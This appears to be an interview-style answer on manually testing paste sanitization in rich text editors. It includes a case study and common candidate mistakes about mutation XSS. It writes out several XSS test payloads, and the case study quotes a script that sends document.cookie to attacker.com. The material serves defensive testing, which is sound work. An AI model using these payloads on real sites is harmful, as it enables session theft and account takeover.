Answer to the question

History: Rich text editors (RTEs) are ubiquitous in content management systems, yet they represent a critical attack surface. When users copy content from Microsoft Word or Google Docs, the clipboard contains rich HTML with proprietary metadata, inline styles, and potentially malicious payloads hidden in SVG tags or CSS expressions. The core problem is that naive sanitization might strip visible formatting while missing executable scripts, or conversely, over-sanitize and destroy legitimate semantic structures like complex tables. A systematic manual testing methodology must verify both security (no XSS) and fidelity (preserved structure).

Solution: Implement a three-phase clipboard assault protocol:

Vector Preparation: Curate a library of paste payloads including SVG with embedded <foreignObject> containing scripts, CSS behavior: url(#default#VML) for legacy IE, HTML entity-encoded javascript: protocols, and malformed HTML5 tags designed to exploit browser parser quirks (e.g., <noscript><img src=x onerror=alert(1)></noscript>).
Cross-Engine Paste Simulation: Perform actual copy-paste operations (not typing) from Word (with tracked changes, comments, and embedded Excel objects), Google Docs (with suggested edits and embedded drawings), and raw HTML copied from Browser DevTools. Test in Chrome, Safari, Firefox, and Edge separately, as each handles clipboard MIME types (text/html vs application/rtf) differently.
State Verification: After paste, inspect the DOM via DevTools to confirm that on* event handlers, javascript: URLs, and <script> tags are absent, while verifying that semantic elements (<thead>, <colgroup>, nested lists) remain intact. Then save the content, reload the page, and check the serialized HTML again to detect mutation XSS where the browser parser resurrects scripts during re-rendering.

Situation from life

Problem: A legal tech startup developed a contract review application using TinyMCE where attorneys pasted clauses from Microsoft Word. A security audit revealed that contracts containing vendor logos (in SVG format) were executing arbitrary JavaScript when viewed in the reviewer's dashboard. The SVG files contained <script>fetch('https://attacker.com?cookie='+document.cookie)</script> inside <foreignObject> tags. The editor displayed them as harmless images, but the raw HTML stored in the PostgreSQL database executed in the read-only view which used dangerouslySetInnerHTML in React without secondary sanitization.

Solutions considered:

Solution A: Strip all HTML and convert to plain text. Pros: Absolute security guarantee; no XSS possible. Cons: Attorneys lost critical formatting like indentation for contract sub-clauses, colored highlighting for risk assessment, and table structures for fee schedules. This rendered the application unusable for legal workflows, causing immediate user rejection.

Solution B: Rely solely on client-side DOMPurify with a permissive configuration. Pros: Preserves user experience and formatting; easy to implement. Cons: Client-side sanitization can be bypassed by directly calling the REST API with malicious payloads, bypassing the editor entirely. Additionally, DOMPurify's default settings allow SVG tags and data-attributes that execute in specific Android WebView versions.

Solution C: Implement defense-in-depth with aggressive client-side cleaning for immediate feedback, combined with server-side sanitization using the OWASP Java HTML Sanitizer with a strict policy allowing only structural tags. Pros: Catches bypass attempts at the API level; allows necessary legal formatting while neutralizing scripts. Cons: Requires maintaining two policy configurations (frontend and backend); risk of performance degradation when processing 100+ page contracts; potential for "consent dialogs" if policies mismatch.

Chosen solution: We selected Solution C and added a manual QA checkpoint specifically for paste operations. The QA team created a "Malicious Clipboard Suite" containing 75+ CSP bypass vectors, including SVG animations and MathML containers. They discovered that DOMPurify's ALLOWED_URI_REGEXP was permitting javascript: URLs encoded with HTML entities. They configured the sanitizer to flatten all SVG to static <img> tags with Base64 encoding, stripping all interactive elements.

Result: The vulnerability was patched before production release. The methodology caught two additional mXSS vectors involving HTML comments that mutated into executable scripts in Safari's reader mode. The legal team retained full formatting capabilities, and subsequent penetration testing found no injection vectors in the paste pipeline.

What candidates often miss

How do you detect mutation XSS (mXSS) where the browser's parser modifies the sanitized string after insertion, re-creating executable scripts?

Many candidates inspect the HTML immediately after paste using the editor's "source view" or DevTools. However, mXSS exploits occur when the sanitized string is assigned to innerHTML, the browser parses it, and the resulting DOM differs from the original string due to parser normalization (e.g., <noscript><img title="--><script>... mutations). The correct approach is to perform a round-trip test: serialize the DOM back to a string using element.innerHTML after insertion, then compare it against the expected sanitized output. If new <script> tags or event handlers appear after this serialization, the sanitizer is vulnerable. Additionally, test specifically in IE11 if supported, as its parser behavior for malformed tables differs significantly from Blink or Gecko.

Why might content paste correctly and safely in the editor, but fail security validation when the same content is later loaded into a read-only React view via dangerouslySetInnerHTML?

Candidates often miss "contextual sanitization drift." Rich text editors sanitize for the editing context, but the viewing context might use different React versions, Content Security Policy headers, or additional JavaScript libraries that re-parse the content. The answer is that you must verify the stored content through the entire lifecycle: paste → save to API → retrieve from API → render in read-only view. Specifically, check for double-encoding issues where < becomes &lt; during database storage, or Unicode normalization differences between the editor's UTF-8 handling and the database's collation. Test with payloads containing smart quotes (curly quotes) and em-dashes, which Word auto-substitutes, to ensure the database UTF-8MB4 configuration doesn't truncate multi-byte characters, potentially breaking sanitization boundaries and allowing script injection.

How would you manually validate sanitization behavior when the application uses a Markdown-based editor (like CKEditor 5 with Markdown output) rather than raw HTML storage?

This tests understanding of format conversion risks. When editors convert HTML to Markdown (e.g., via Turndown), malicious payloads can hide in HTML attributes that have no Markdown equivalent, potentially being stripped incompletely or converted into link references that execute on click. The correct methodology involves: (1) Pasting the malicious HTML into the editor, (2) Switching to Markdown source view to verify that dangerous attributes are gone (not just visually hidden), (3) Converting back to HTML (if supported) to ensure the round-trip doesn't resurrect scripts, and (4) Checking that Markdown link syntax [text](javascript:alert(1)) is explicitly blocked by the parser's link validation regex, not just the renderer. Additionally, verify that HTML comments  (which can break Markdown parsers) are stripped to prevent leakage of sensitive server-side data.